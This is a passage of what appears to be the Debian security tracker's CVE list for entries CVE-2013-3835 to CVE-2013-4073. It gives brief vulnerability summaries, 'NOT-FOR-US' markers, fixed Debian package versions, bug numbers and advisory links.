	- ruby1.8 1.8.7.358-7.1 (bug #714541)
	- ruby1.9.1 1.9.3.194-8.2 (bug #714543)
	- puppet (Only affects Puppet Enterprise)
	NOTE: http://www.ruby-lang.org/en/news/2013/06/27/hostname-check-bypassing-vulnerability-in-openssl-client-cve-2013-4073/
	NOTE: https://github.com/ruby/ruby/commit/2669b84d407ab431e965145c827db66c91158f89 (1.9.3)
	NOTE: https://github.com/ruby/ruby/commit/961bf7496ded3acfe847cf56fa90bbdcfd6e614f (1.8.7)
	NOTE: Regression with patch: https://bugs.ruby-lang.org/issues/8575
	NOTE: http://svn.ruby-lang.org/cgi-bin/viewvc.cgi?revision=41812&view=revision
CVE-2013-4072 RESERVED
CVE-2013-4071 RESERVED
CVE-2013-4070 (The Portal application in IBM SPSS Collaboration and Deployment Servic ...)
	NOT-FOR-US: IBM SPSS Collaboration and Deployment Services
CVE-2013-4069 (The Portal application in IBM SPSS Collaboration and Deployment Servic ...)
	NOT-FOR-US: IBM SPSS Collaboration and Deployment Services
CVE-2013-4068 (Buffer overflow in iNotes in IBM Domino 8.5.3 before FP5 IF1 and 9.0 b ...)
	NOT-FOR-US: IBM
CVE-2013-4067 (IBM InfoSphere Information Server 8.0, 8.1, 8.5 through FP3, 8.7, and ...)
	NOT-FOR-US: IBM InfoSphere Information Server
CVE-2013-4066 (IBM InfoSphere Information Server 8.0, 8.1, 8.5 through FP3, 8.7, and ...)
	NOT-FOR-US: IBM InfoSphere Information Server
CVE-2013-4065 (Cross-site scripting (XSS) vulnerability in iNotes in IBM Domino 8.5.x ...)
	NOT-FOR-US: iNotes in IBM Domino
CVE-2013-4064 (Cross-site scripting (XSS) vulnerability in iNotes in IBM Domino 8.5.x ...)
	NOT-FOR-US: iNotes in IBM Domino
CVE-2013-4063 (Cross-site scripting (XSS) vulnerability in iNotes in IBM Domino 8.5.x ...)
	NOT-FOR-US: iNotes in IBM Domino
CVE-2013-4062 (IBM Rational Policy Tester 8.5 before 8.5.0.5 does not verify X.509 ce ...)
	NOT-FOR-US: IBM
CVE-2013-4061 (IBM Rational Policy Tester 8.5 before 8.5.0.5 does not properly check ...)
	NOT-FOR-US: IBM
CVE-2013-4060 RESERVED
CVE-2013-4059 (Multiple cross-site scripting (XSS) vulnerabilities in IBM InfoSphere ...)
	NOT-FOR-US: IBM InfoSphere
CVE-2013-4058 (Multiple SQL injection vulnerabilities in IBM InfoSphere Information S ...)
	NOT-FOR-US: IBM InfoSphere
CVE-2013-4057 (Cross-site request forgery (CSRF) vulnerability in the XML Pack in IBM ...)
	NOT-FOR-US: IBM InfoSphere
CVE-2013-4056 (Cross-site request forgery (CSRF) vulnerability in the Data Quality Co ...)
	NOT-FOR-US: IBM
CVE-2013-4055 (Cross-site scripting (XSS) vulnerability in webadmin.nsf in Domino Web ...)
	NOT-FOR-US: IBM Domino
CVE-2013-4054 (Directory traversal vulnerability in WMQ Telemetry in IBM WebSphere MQ ...)
	NOT-FOR-US: WebSphere
CVE-2013-4053 (The WS-Security implementation in IBM WebSphere Application Server (WA ...)
	NOT-FOR-US: WebSphere
CVE-2013-4052 (Cross-site scripting (XSS) vulnerability in the UDDI Administrative co ...)
	NOT-FOR-US: WebSphere
CVE-2013-4051 (Cross-site scripting (XSS) vulnerability in webadmin.nsf in Domino Web ...)
	NOT-FOR-US: IBM Domino
CVE-2013-4050 (Cross-site request forgery (CSRF) vulnerability in webadmin.nsf in Dom ...)
	NOT-FOR-US: IBM Domino
CVE-2013-4049 (Unrestricted file upload vulnerability in IBM SPSS Analytical Decision ...)
	NOT-FOR-US: IBM SPSS
CVE-2013-4048 (Cross-site scripting (XSS) vulnerability in IBM SPSS Analytical Decisi ...)
	NOT-FOR-US: IBM SPSS
CVE-2013-4047 (Cross-site scripting (XSS) vulnerability in IBM SPSS Analytical Decisi ...)
	NOT-FOR-US: IBM SPSS
CVE-2013-4046 (Open redirect vulnerability in IBM SPSS Collaboration and Deployment S ...)
	NOT-FOR-US: IBM SPSS Collaboration and Deployment Services
CVE-2013-4045 (Cross-site scripting (XSS) vulnerability in the Portal application in ...)
	NOT-FOR-US: IBM SPSS Collaboration and Deployment Services
CVE-2013-4044 (IBM SPSS Collaboration and Deployment Services 4.2.1 before 4.2.1.3 IF ...)
	NOT-FOR-US: IBM SPSS Collaboration and Deployment Services
CVE-2013-4043 (The server in IBM SPSS Collaboration and Deployment Services 4.x befor ...)
	NOT-FOR-US: IBM SPSS Collaboration and Deployment Services
CVE-2013-4042 (Unspecified vulnerability in IBM SPSS Collaboration and Deployment Ser ...)
	NOT-FOR-US: IBM SPSS Collaboration and Deployment Services
CVE-2013-4041 (Unspecified vulnerability in IBM Java SDK 5.0.0 before SR16 FP4, 7.0.0 ...)
	NOT-FOR-US: IBM JDK
CVE-2013-4040 (IBM Tivoli Application Dependency Discovery Manager (TADDM) 7.1.2.x be ...)
	NOT-FOR-US: IBM Tivoli Application Dependency Discovery Manager
CVE-2013-4039 (IBM WebSphere Extended Deployment Compute Grid 8.0 before 8.0.0.3 allo ...)
	NOT-FOR-US: IBM WebSphere
CVE-2013-4038 (The Intelligent Platform Management Interface (IPMI) implementation in ...)
	NOT-FOR-US: IBM BladeCenter
CVE-2013-4037 (The RAKP protocol support in the Intelligent Platform Management Inter ...)
	NOT-FOR-US: IBM BladeCenter
CVE-2013-4036 (Cross-site scripting (XSS) vulnerability in IBM InfoSphere Master Data ...)
	NOT-FOR-US: IBM
CVE-2013-4035 (IBM Sterling Connect:Direct for OpenVMS 3.4.00, 3.4.01, 3.5.00, 3.6.0, ...)
	NOT-FOR-US: IBM Sterling
CVE-2013-4034 (IBM Cognos Business Intelligence 8.4.1 before IF3, 10.1.0 before IF4, ...)
	NOT-FOR-US: IBM
CVE-2013-4033 (IBM DB2 and DB2 Connect 9.7 through FP8, 9.8 through FP5, 10.1 through ...)
	NOT-FOR-US: IBM DB2
CVE-2013-4032 (The Fast Communications Manager (FCM) in IBM DB2 Enterprise Server Edi ...)
	NOT-FOR-US: IBM
CVE-2013-4031 (The Intelligent Platform Management Interface (IPMI) implementation in ...)
	NOT-FOR-US: IBM BladeCenter
CVE-2013-4030 (Integrated Management Module (IMM) 2 1.00 through 2.00 on IBM System X ...)
	NOT-FOR-US: IBM System X and Flex System
CVE-2013-4029 RESERVED
CVE-2013-4028 RESERVED
CVE-2013-4027 (IBM Maximo Asset Management 6.2 through 6.2.8, 7.1 through 7.1.1.12, a ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2013-4026 RESERVED
CVE-2013-4025 (IBM Data Studio Web Console 3.x before 3.2, Optim Performance Manager ...)
	NOT-FOR-US: IBM
CVE-2013-4024 (IBM Data Studio Web Console 3.x before 3.2, Optim Performance Manager ...)
	NOT-FOR-US: IBM
CVE-2013-4023 RESERVED
CVE-2013-4022 (IBM Data Studio Web Console 3.x before 3.2, Optim Performance Manager ...)
	NOT-FOR-US: IBM
CVE-2013-4021 (IBM Maximo Asset Management 6.2 through 6.2.8, 7.1 before 7.1.1.12, an ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2013-4020 (IBM Maximo Asset Management 6.2 through 6.2.8, 7.1 through 7.1.1.12, a ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2013-4019 (Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Managemen ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2013-4018 (IBM Maximo Asset Management 6.2 through 6.2.8, 7.1 before 7.1.1.12, an ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2013-4017 (SQL injection vulnerability in IBM Maximo Asset Management 7.1 before ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2013-4016 (SQL injection vulnerability in IBM Maximo Asset Management 7.x before ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2013-4015 (Microsoft Internet Explorer 6 through 10 allows local users to bypass ...)
	NOT-FOR-US: MS IE
CVE-2013-4014 (Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Managemen ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2013-4013 (IBM Maximo Asset Management 6.2 through 6.2.8, 7.1 through 7.1.1.12, a ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2013-4012 (IBM WebSphere Portal 8.0.0.x before 8.0.0.1 CF09, when Content Templat ...)
	NOT-FOR-US: IBM WebSphere Portal
CVE-2013-4011 (Multiple unspecified vulnerabilities in the InfiniBand subsystem in IB ...)
	NOT-FOR-US: IBM AIX
CVE-2013-4010 RESERVED
CVE-2013-4009 RESERVED
CVE-2013-4008 RESERVED
CVE-2013-4007 (Cross-site scripting (XSS) vulnerability in adv_sw.php in the Advanced ...)
	NOT-FOR-US: IBM
CVE-2013-4006 (IBM WebSphere Application Server (WAS) Liberty Profile 8.5 before 8.5. ...)
	NOT-FOR-US: IBM
CVE-2013-4005 (Cross-site scripting (XSS) vulnerability in the Administrative console ...)
	NOT-FOR-US: IBM WebSphere
CVE-2013-4004 (Cross-site scripting (XSS) vulnerability in the Administrative console ...)
	NOT-FOR-US: IBM WebSphere
CVE-2013-4003 (Multiple cross-site scripting (XSS) vulnerabilities in IBM TRIRIGA App ...)
	NOT-FOR-US: IBM TRIRIGA
CVE-2013-4002 (XMLscanner.java in Apache Xerces2 Java Parser before 2.12.0, as used i ...)
	- openjdk-6 6b27-1.12.7-1
	- openjdk-7 7u45-2.4.3-1
CVE-2013-4001 (Session fixation vulnerability in IBM Cognos Command Center before 10. ...)
	NOT-FOR-US: IBM Cognos Command Center
CVE-2013-4000 (Multiple cross-site request forgery (CSRF) vulnerabilities in IBM Cogn ...)
	NOT-FOR-US: IBM Cognos Command Center
CVE-2013-3999 (Cross-site scripting (XSS) vulnerability in IBM Social Media Analytics ...)
	NOT-FOR-US: IBM Social Media Analytics
CVE-2013-3998 (CRLF injection vulnerability in the Web Application Enterprise Console ...)
	NOT-FOR-US: IBM InfoSphere
CVE-2013-3997 (Open redirect vulnerability in the Web Application Enterprise Console ...)
	NOT-FOR-US: IBM InfoSphere
CVE-2013-3996 (IBM InfoSphere BigInsights 1.1 through 2.1 does not properly handle FR ...)
	NOT-FOR-US: IBM
CVE-2013-3995 (Cross-site scripting (XSS) vulnerability in IBM InfoSphere BigInsights ...)
	NOT-FOR-US: IBM
CVE-2013-3994 RESERVED
CVE-2013-3993 (IBM InfoSphere BigInsights before 2.1.0.3 allows remote authenticated ...)
	NOT-FOR-US: IBM InfoSphere BigInsights
CVE-2013-3992 (Cross-site request forgery (CSRF) vulnerability in IBM InfoSphere BigI ...)
	NOT-FOR-US: IBM
CVE-2013-3991 RESERVED
CVE-2013-3990 (Cross-site scripting (XSS) vulnerability in the MIME e-mail functional ...)
	NOT-FOR-US: IBM
CVE-2013-3989 (IBM Security AppScan Enterprise 8.x before 8.8 sends a cleartext AppSc ...)
	NOT-FOR-US: IBM Security AppScan Enterprise
CVE-2013-3988 (The Meeting Server in IBM Sametime 8.5.2 through 8.5.2.1 and 9.x throu ...)
	NOT-FOR-US: IBM Sametime
CVE-2013-3987 RESERVED
CVE-2013-3986 (IBM Lotus Sametime 8.5.2 and 8.5.2.1 allows remote attackers to cause ...)
	NOT-FOR-US: IBM
CVE-2013-3985 (The Enterprise Meeting Server in IBM Lotus Sametime 8.5.2 and 8.5.2.1 ...)
	NOT-FOR-US: IBM
CVE-2013-3984 (The Meeting Server in IBM Sametime 8.x through 8.5.2.1 and 9.x through ...)
	NOT-FOR-US: IBM Sametime
CVE-2013-3983 (The Meeting Server in IBM Sametime 8.5.2 through 8.5.2.1 and 9.x throu ...)
	NOT-FOR-US: IBM Sametime
CVE-2013-3982 (The Meeting Server in IBM Sametime 8.x through 8.5.2.1 and 9.x through ...)
	NOT-FOR-US: IBM Sametime
CVE-2013-3981 (The Meeting Server in IBM Sametime 8.x through 8.5.2.1 and 9.x through ...)
	NOT-FOR-US: IBM Sametime
CVE-2013-3980 (The Meeting Server in IBM Sametime 8.x through 8.5.2.1 and 9.x through ...)
	NOT-FOR-US: IBM Sametime
CVE-2013-3979 (Multiple cross-site scripting (XSS) vulnerabilities in the help pages ...)
	NOT-FOR-US: IBM Cognos Command Center
CVE-2013-3978 (The Meeting Server in IBM Sametime 8.5.2 through 8.5.2.1 and 9.x throu ...)
	NOT-FOR-US: IBM Sametime
CVE-2013-3977 (The Meeting Server in IBM Sametime 8.x through 8.5.2.1 and 9.x through ...)
	NOT-FOR-US: IBM Sametime
CVE-2013-3976 (The (1) Data Protection for Exchange component 6.1 before 6.1.3.4 and ...)
	NOT-FOR-US: IBM Tivoli
CVE-2013-3975 (Unspecified vulnerability in the Meeting Server in IBM Sametime 8.x th ...)
NOT-FOR-US: IBM Sametime CVE-2013-3974 RESERVED CVE-2013-3973 (SQL injection vulnerability in IBM Maximo Asset Management 7.1 before ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-3972 (IBM Maximo Asset Management 7.1 before 7.1.1.12 and 7.5 before 7.5.0.5 ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-3971 (IBM Maximo Asset Management 7.1 through 7.1.1.12 and 7.5 before 7.5.0. ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-3970 (Juniper Junos Pulse Secure Access Service (aka SSL VPN) with IVE OS 7. ...) NOT-FOR-US: Juniper Junos Pulse Secure Access Service CVE-2013-3969 (The find prototype in scripting/engine_v8.h in MongoDB 2.4.0 through 2 ...) - mongodb 1:2.4.5-1 (bug #715007; bug #717173) [squeeze] - mongodb (Only affects 2.4.x) [wheezy] - mongodb (Only affects 2.4.x) NOTE: http://www.mongodb.org/about/alerts/ SERVER-9878 CVE-2013-3968 RESERVED CVE-2013-3967 RESERVED CVE-2013-3966 RESERVED CVE-2013-3965 RESERVED CVE-2013-3964 (Cross-site scripting (XSS) vulnerability in Samsung SHR-5162, SHR-5082 ...) NOT-FOR-US: Samsung CVE-2013-3963 (Cross-site request forgery (CSRF) vulnerability in goform/usermanage i ...) NOT-FOR-US: Grandstream CVE-2013-3962 (Cross-site scripting (XSS) vulnerability in Grandstream GXV3501, GXV35 ...) NOT-FOR-US: Grandstream CVE-2013-3961 (SQL injection vulnerability in edit_event.php in Simple PHP Agenda bef ...) NOT-FOR-US: Simple PHP Agenda CVE-2013-3960 (Easytime Studio Easy File Manager 1.1 has a HTTP request security bypa ...) NOT-FOR-US: Easytime Studio Easy File Manager CVE-2013-3959 (The Web Navigator in Siemens WinCC before 7.2 Update 1, as used in SIM ...) NOT-FOR-US: Siemens WinCC CVE-2013-3958 (The login implementation in the Web Navigator in Siemens WinCC before ...) NOT-FOR-US: Siemens WinCC CVE-2013-3957 (SQL injection vulnerability in the login screen in the Web Navigator i ...) NOT-FOR-US: Siemens WinCC CVE-2013-3956 (The NICM.SYS kernel driver 3.1.11.0 in Novell Client 4.91 SP5 on Windo ...) 
NOT-FOR-US: Novell Client on Windows CVE-2013-3955 (The get_xattrinfo function in the XNU kernel in Apple iOS 5.x and 6.x ...) NOT-FOR-US: Apple iOS CVE-2013-3954 (The posix_spawn system call in the XNU kernel in Apple Mac OS X 10.8.x ...) NOT-FOR-US: Apple Mac OS X CVE-2013-3953 (The mach_port_space_info function in osfmk/ipc/mach_debug.c in the XNU ...) NOT-FOR-US: Apple Mac OS X CVE-2013-3952 (The fill_pipeinfo function in bsd/kern/sys_pipe.c in the XNU kernel in ...) NOT-FOR-US: Apple Mac OS X CVE-2013-3951 (sys/openbsd/stack_protector.c in libc in Apple iOS 6.1.3 and Mac OS X ...) NOT-FOR-US: Apple iOS CVE-2013-3950 (Stack-based buffer overflow in the openSharedCacheFile function in dyl ...) NOT-FOR-US: Apple iOS CVE-2013-3949 (The posix_spawn system call in the XNU kernel in Apple Mac OS X 10.8.x ...) NOT-FOR-US: Apple Mac OS X CVE-2013-3948 (Apple iOS 6.1.3 does not follow redirects during determination of the ...) NOT-FOR-US: Apple iOS CVE-2013-3947 (Buffer overflow in MedCoreD.sys in AhnLab V3 Internet Security 8.0.7.5 ...) NOT-FOR-US: AhnLab V3 Internet Security CVE-2013-3946 (Heap-based buffer overflow in the MrSID plugin (MrSID.dll) before 4.37 ...) NOT-FOR-US: MrSID plugin (MrSID.dll) for IrfanView CVE-2013-3945 (The MrSID plugin (MrSID.dll) before 4.37 for IrfanView allows remote a ...) NOT-FOR-US: MrSID plugin (MrSID.dll) for IrfanView CVE-2013-3944 (Stack-based buffer overflow in the MrSID plugin (MrSID.dll) before 4.3 ...) NOT-FOR-US: MrSID plugin (MrSID.dll) for IrfanView CVE-2013-3943 (Cross-site scripting (XSS) vulnerability in DotNetNuke (DNN) before 6. ...) NOT-FOR-US: DotNetNukeDot CVE-2013-3942 (Potplayer prior to 1.5.39659: DLL Loading Arbitrary Code Execution Vul ...) NOT-FOR-US: Potplayer CVE-2013-3941 (Xjp2.dll in XnView before 2.13 allows remote attackers to execute arbi ...) NOT-FOR-US: XnView CVE-2013-3940 (Integer overflow in the Graphics Device Interface (GDI) in Microsoft W ...) 
NOT-FOR-US: Microsoft CVE-2013-3939 (xnview.exe in XnView before 2.13 does not properly handle RLE strip le ...) NOT-FOR-US: XnView CVE-2013-3938 (Integer overflow in xnview.exe in XnView 2.13 allows remote attackers ...) NOT-FOR-US: XnView CVE-2013-3937 (Heap-based buffer overflow in xnview.exe in XnView before 2.13 allows ...) NOT-FOR-US: XnView CVE-2013-3936 (Multiple cross-site scripting (XSS) vulnerabilities in Opsview before ...) NOT-FOR-US: Opsview CVE-2013-3935 (Cross-site request forgery (CSRF) vulnerability in Opsview before 4.4. ...) NOT-FOR-US: Opsview CVE-2013-3934 (Stack-based buffer overflow in Kingsoft Writer 2012 8.1.0.3030, as use ...) NOT-FOR-US: Kingsoft Office 2013 CVE-2013-3933 (Cross-site scripting (XSS) vulnerability in the JoomShopping (com_joom ...) NOT-FOR-US: Joomla component com_joomshopping CVE-2013-3932 (SQL injection vulnerability in the Jomres (com_jomres) component befor ...) NOT-FOR-US: Jomres (com_jomres) component for Joomla! CVE-2013-3931 (Cross-site scripting (XSS) vulnerability in the Jomres (com_jomres) co ...) NOT-FOR-US: Jomres (com_jomres) component for Joomla! CVE-2013-3930 (Stack-based buffer overflow in Core FTP before 2.2 build 1785 allows r ...) NOT-FOR-US: Core FTP (client) CVE-2013-3929 (Cross-site scripting (XSS) vulnerability in admin/editevent.php in CMS ...) NOT-FOR-US: CMS Made Simple CVE-2013-3928 (Stack-based buffer overflow in the ReadFile function in flt_BMP.dll in ...) NOT-FOR-US: Chasys Draw IES CVE-2013-3927 (Unspecified vulnerability in the client library in Siemens COMOS 9.2 b ...) NOT-FOR-US: Siemens COMOS CVE-2013-3926 (** DISPUTED ** Atlassian Crowd 2.6.3 allows remote attackers to execut ...) NOT-FOR-US: Atlassian Crowd CVE-2013-3925 (Atlassian Crowd 2.5.x before 2.5.4, 2.6.x before 2.6.3, 2.3.8, and 2.4 ...) NOT-FOR-US: Atlassian Crowd CVE-2013-3924 RESERVED CVE-2013-3923 (Directory traversal vulnerability in SavySoda WiFi HD Free before 7.0 ...) 
NOT-FOR-US: SavySoda WiFi HD Free CVE-2013-3922 (Directory traversal vulnerability in Gummy Bear Studios FTP Drive + HT ...) NOT-FOR-US: Gummy Bear Studios FTP Drive + HTTP Server CVE-2013-3921 (Directory traversal vulnerability in Easytime Studio Easy File Manager ...) NOT-FOR-US: Easytime Studio Easy File Manager CVE-2013-3920 (Cross-site scripting (XSS) vulnerability in Jahia xCM before 6.6.2 all ...) NOT-FOR-US: Jahia xCM CVE-2013-3918 (The InformationCardSigninHelper Class ActiveX control in icardie.dll i ...) NOT-FOR-US: Microsoft CVE-2013-3917 (Microsoft Internet Explorer 6 through 11 allows remote attackers to ex ...) NOT-FOR-US: Microsoft CVE-2013-3916 (Microsoft Internet Explorer 8 through 11 allows remote attackers to ex ...) NOT-FOR-US: Microsoft CVE-2013-3915 (Microsoft Internet Explorer 6 through 11 allows remote attackers to ex ...) NOT-FOR-US: Microsoft CVE-2013-3914 (Microsoft Internet Explorer 9 through 11 allows remote attackers to ex ...) NOT-FOR-US: Microsoft CVE-2013-3913 REJECTED CVE-2013-3912 (Microsoft Internet Explorer 8 through 11 allows remote attackers to ex ...) NOT-FOR-US: Microsoft CVE-2013-3911 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...) NOT-FOR-US: Microsoft CVE-2013-3910 (Microsoft Internet Explorer 6 through 9 allows remote attackers to exe ...) NOT-FOR-US: Microsoft CVE-2013-3909 (Microsoft Internet Explorer 6 through 8 allows remote attackers to rea ...) NOT-FOR-US: Microsoft CVE-2013-3908 (Microsoft Internet Explorer 6 through 10 allows user-assisted remote a ...) NOT-FOR-US: Microsoft CVE-2013-3907 (portcls.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, ...) NOT-FOR-US: Microsoft Windows Vista CVE-2013-3906 (GDI+ in Microsoft Windows Vista SP2 and Server 2008 SP2; Office 2003 S ...) NOT-FOR-US: Microsoft CVE-2013-3905 (Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does n ...) 
NOT-FOR-US: Microsoft CVE-2013-3904 REJECTED CVE-2013-3903 (Array index error in win32k.sys in the kernel-mode drivers in Microsof ...) NOT-FOR-US: Microsoft Windows CVE-2013-3902 (Use-after-free vulnerability in win32k.sys in the kernel-mode drivers ...) NOT-FOR-US: Microsoft Windows CVE-2013-3901 REJECTED CVE-2013-3900 (The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windo ...) NOT-FOR-US: Microsoft Windows CVE-2013-3899 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft Windows CVE-2013-3898 (Microsoft Windows 8 and Windows Server 2012, when Hyper-V is used, doe ...) NOT-FOR-US: Microsoft CVE-2013-3897 (Use-after-free vulnerability in the CDisplayPointer class in mshtml.dl ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3896 (Microsoft Silverlight 5 before 5.1.20913.0 does not properly validate ...) NOT-FOR-US: Microsoft Silverlight CVE-2013-3895 (Microsoft SharePoint Server 2007 SP3 and 2010 SP1 and SP2 allows remot ...) NOT-FOR-US: Microsoft SharePoint Server CVE-2013-3894 (The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows S ...) NOT-FOR-US: Microsoft Windows CVE-2013-3893 (Use-after-free vulnerability in the SetMouseCapture implementation in ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3892 (Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote ...) NOT-FOR-US: Microsoft Word CVE-2013-3891 (Microsoft Word 2003 SP3 allows remote attackers to execute arbitrary c ...) NOT-FOR-US: Microsoft Word CVE-2013-3890 (Microsoft Excel 2007 SP3, Excel Viewer, and Office Compatibility Pack ...) NOT-FOR-US: Microsoft CVE-2013-3889 (Microsoft Excel 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT; Office ...) NOT-FOR-US: Microsoft CVE-2013-3888 (dxgkrnl.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, ...) NOT-FOR-US: Microsoft Windows CVE-2013-3887 (The Ancillary Function Driver (AFD) in afd.sys in the kernel-mode driv ...) 
NOT-FOR-US: Microsoft CVE-2013-3886 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3885 (Microsoft Internet Explorer 10 allows remote attackers to execute arbi ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3884 REJECTED CVE-2013-3883 REJECTED CVE-2013-3882 (Microsoft Internet Explorer 10 allows remote attackers to execute arbi ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3881 (win32k.sys in the kernel-mode drivers in Microsoft Windows 7 SP1 and W ...) NOT-FOR-US: Microsoft Windows CVE-2013-3880 (The App Container feature in the kernel-mode drivers in Microsoft Wind ...) NOT-FOR-US: Microsoft Windows CVE-2013-3879 (Use-after-free vulnerability in win32k.sys in the kernel-mode drivers ...) NOT-FOR-US: Microsoft Windows CVE-2013-3878 (Stack-based buffer overflow in the LRPC client in Microsoft Windows XP ...) NOT-FOR-US: Microsoft Windows CVE-2013-3877 REJECTED CVE-2013-3876 (DirectAccess in Microsoft Windows XP SP2 and SP3, Windows Server 2003 ...) NOT-FOR-US: Microsoft CVE-2013-3875 (Microsoft Internet Explorer 8 and 9 allows remote attackers to execute ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3874 (Microsoft Internet Explorer 9 allows remote attackers to execute arbit ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3873 (Microsoft Internet Explorer 10 allows remote attackers to execute arbi ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3872 (Microsoft Internet Explorer 10 allows remote attackers to execute arbi ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3871 (Microsoft Internet Explorer 6 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3870 (Double free vulnerability in Microsoft Outlook 2007 SP3 and 2010 SP1 a ...) NOT-FOR-US: Microsoft Outlook CVE-2013-3869 (Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vis ...) 
NOT-FOR-US: Microsoft CVE-2013-3868 (Microsoft Active Directory Lightweight Directory Service (AD LDS) on W ...) NOT-FOR-US: Microsoft CVE-2013-3867 REJECTED CVE-2013-3866 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft Windows CVE-2013-3865 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft Windows CVE-2013-3864 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft Windows CVE-2013-3863 (Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allow remote atta ...) NOT-FOR-US: Microsoft CVE-2013-3862 (Double free vulnerability in Microsoft Windows 7 and Server 2008 R2 SP ...) NOT-FOR-US: Microsoft CVE-2013-3861 (Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 allo ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-3860 (Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-3859 (Microsoft Pinyin IME 2010, when used in conjunction with Microsoft Off ...) NOT-FOR-US: Microsoft Pinyin IME CVE-2013-3858 (Microsoft Word Automation Services in SharePoint Server 2010 SP1, Word ...) NOT-FOR-US: Microsoft CVE-2013-3857 (Microsoft Word Automation Services in SharePoint Server 2010 SP1 and S ...) NOT-FOR-US: Microsoft CVE-2013-3856 (Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to exec ...) NOT-FOR-US: Microsoft CVE-2013-3855 (Microsoft Word 2003 SP3 and 2007 SP3, Office Compatibility Pack SP3, a ...) NOT-FOR-US: Microsoft CVE-2013-3854 (Microsoft Office 2007 SP3 and Word 2007 SP3 allow remote attackers to ...) NOT-FOR-US: Microsoft CVE-2013-3853 (Microsoft Office 2007 SP3 and Word 2007 SP3 allow remote attackers to ...) NOT-FOR-US: Microsoft CVE-2013-3852 (Microsoft Word 2003 SP3, 2007 SP3, and 2010 SP1; Office Compatibility ...) 
NOT-FOR-US: Microsoft CVE-2013-3851 (Microsoft Office 2003 SP3 and 2007 SP3, Word 2003 SP3 and 2007 SP3, Of ...) NOT-FOR-US: Microsoft CVE-2013-3850 (Microsoft Word 2003 SP3, 2007 SP3, and 2010 SP1 and SP2; Office Compat ...) NOT-FOR-US: Microsoft Word CVE-2013-3849 (Microsoft Word Automation Services in SharePoint Server 2010 SP1, Word ...) NOT-FOR-US: Microsoft CVE-2013-3848 (Microsoft Word Automation Services in SharePoint Server 2010 SP1, Word ...) NOT-FOR-US: Microsoft CVE-2013-3847 (Microsoft Word Automation Services in SharePoint Server 2010 SP1, Word ...) NOT-FOR-US: Microsoft CVE-2013-3846 (Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 a ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3845 (Microsoft Internet Explorer 8 and 9 allows remote attackers to execute ...) NOT-FOR-US: Microsoft CVE-2013-3844 REJECTED CVE-2013-3842 (Unspecified vulnerability Oracle Solaris 10 allows local users to affe ...) NOT-FOR-US: Solaris CVE-2013-3841 (Unspecified vulnerability in the Siebel Core - EAI component in Oracle ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-3840 (Unspecified vulnerability in the Siebel Core - EAI component in Oracle ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-3839 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) {DSA-2818-1 DSA-2780-1} - mysql-5.5 5.5.33 - mysql-5.1 - mariadb-5.5 5.5.35-1 - mariadb-10.0 (Fixed before initial upload) NOTE: http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html CVE-2013-3838 (Unspecified vulnerability in Oracle SPARC Enterprise T & M Series ...) NOT-FOR-US: Oracle SPARC Enterprise CVE-2013-3837 (Unspecified vulnerability in Oracle Solaris 10 and 11.1 allows remote ...) NOT-FOR-US: Oracle Solaris CVE-2013-3836 (Unspecified vulnerability in the Oracle Web Cache component in Oracle ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-3835 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) 
